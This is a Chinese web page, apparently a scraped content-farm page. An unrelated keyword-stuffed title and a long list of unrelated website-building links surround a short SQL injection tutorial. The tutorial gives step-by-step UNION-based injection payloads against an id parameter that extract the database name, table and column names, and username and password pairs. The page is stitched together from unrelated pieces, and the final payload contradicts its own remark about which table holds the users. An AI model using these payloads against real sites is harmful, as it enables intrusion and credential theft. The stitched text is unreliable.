当前位置: 首页 > wzjs >正文

北京建设工程信息网查询衡水做网站优化

wzjs 2025/9/2 5:18:23
北京建设工程信息网查询,衡水做网站优化,网站做的不满意,搭建一个网站平台需要多少钱1.判断是否存在漏洞 添加and 11发现正常显示,添加and 12无回显条目,则存在sql注入漏洞 2.因为有回显,尝试union联合注入,使用order by判断出有3个字段 3.使用union联合注入查看回显位,发现3三个字段均有回显&#xff…

 

1.判断是否存在漏洞

添加and 1=1发现正常显示,添加and 1=2无回显条目,则存在sql注入漏洞

2.因为有回显,尝试union联合注入,使用order by判断出有3个字段

3.使用union联合注入查看回显位,发现3三个字段均有回显,任意使用字段注入即可

4.获取数据库名

?id=-1 union select database(),2,3

5.获取表名,这时候发现如果使用1和2回显位会显示报错,那么可以使用3回显位回显

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

6.猜测用户可能存在user或users表中,先使用user表查看字段

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="user"

7.查看id=1的username和password

这里应该不是user表,真是用户存在users表,将表名改为users一样

?id=-1 union select 1,2,group_concat(username,',',password) from user where id=1

 

http://www.dtcms.com/wzjs/559370.html

相关文章:

  • 临沂网站建设培训学校一般公司常用的邮箱
  • 个人网站建设方案做网站推广 需要ftp
  • 网站建设的主题什么比较好北邻京网站茵建设
  • 腾讯云建设个人网站云南省新农村建设网站
  • 免备案网站建站网站开发广告语
  • 山东川畅科技做网站多少钱网站建设硬件设置
  • 怎么网站网站开发的客户群体
  • 营业范围中网站开发与网页设计上海网站备案人工服务器
  • 长沙网站外包公司吗郴州市北湖区
  • 网站建设柚子网络科技官网做一个付费网站多少钱
  • 大学生兼职网站的融资方案跨境电商如何开店
  • 关于wap网站模板下载付第三期网站建设费的账务处理
  • 做电气设计有哪些好的网站好用的网站模板
  • 电子商务网站建设 上海wordpress一键ssl
  • 期末成绩怎么做网站海南科技职业大学教务网络管理系统
  • 电子商务网站建设主管的策划案个人网站模板之家
  • 美食网站建设项目预算微信网站开发价格
  • 导航网站的好处万域网站建设
  • 网站底部的备案号商城系统管理
  • 百度网站官网入口网站免费模块
  • 工信部网站备案查询 手机重庆网页制作设计营销
  • 建设旅游网站缺点迅雷下载磁力天堂
  • 模拟建设官方网站奉贤建设机械网站
  • 建设网站用图片需要版权苏州技术馆网站建设
  • 门户网站设计思路钉钉专业版多少钱
  • 网站建设费属于什么税目做网站赚钱需要多少人手
  • 怎么做qq网站网站设置不发送消息怎么设置回来
  • 营销型网站的基础建设做年会的网站
  • 4414站长平台北京营销型网站公司
  • php网站目录系统保网微商城官网